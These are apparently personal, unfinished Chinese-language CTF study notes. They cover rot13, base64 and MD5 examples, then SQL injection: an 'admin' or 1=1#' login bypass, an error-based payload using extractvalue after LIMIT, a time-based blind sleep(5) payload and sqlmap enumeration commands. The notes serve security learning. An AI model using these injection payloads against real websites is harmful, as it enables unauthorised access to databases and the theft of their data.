ctf

ctf杂记


CTF

f1a9:{ke7_1s_here_13ut_d0_y0u_kn0w}
http://hackinglab.cn

密码学

rot13

字母顺推13位,数字不变
e.g. : xrlvf23xfqwsxsqf (keyis23ksdjfkfds)

base64

e.g. YmFzZTY0bHNuMHRhYmFkMWRlYQ== (base64lsn0tabad1dea)

MD5

Message Digest Algorithm MD5 (消息摘要算法 第五版)
e.g. : e0960851294d7b2253978ba858e24633


SQL注入

万能密码

admin’ or 1=1#


limit位置

若加了order by 就不能从账号密码注入,但是limit在其后是可以控制的
url后面输入:

procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23

出现 XPATH syntax error: ‘:5.1.73’ 报错注入则证明注入点可行

宽字节注入

报错注入

https://www.waitalone.cn/mysql-error-based-injection.html

SQLMap

1
2
3
4
5
6
$ sqlmap -u [url] --dbs # 列出数据库
-D Database
--tables -T
--columns -C
--thread 10 线程
--technique=T 盲注方式

盲注

时间

id=1’ and sleep(5)%23



未完..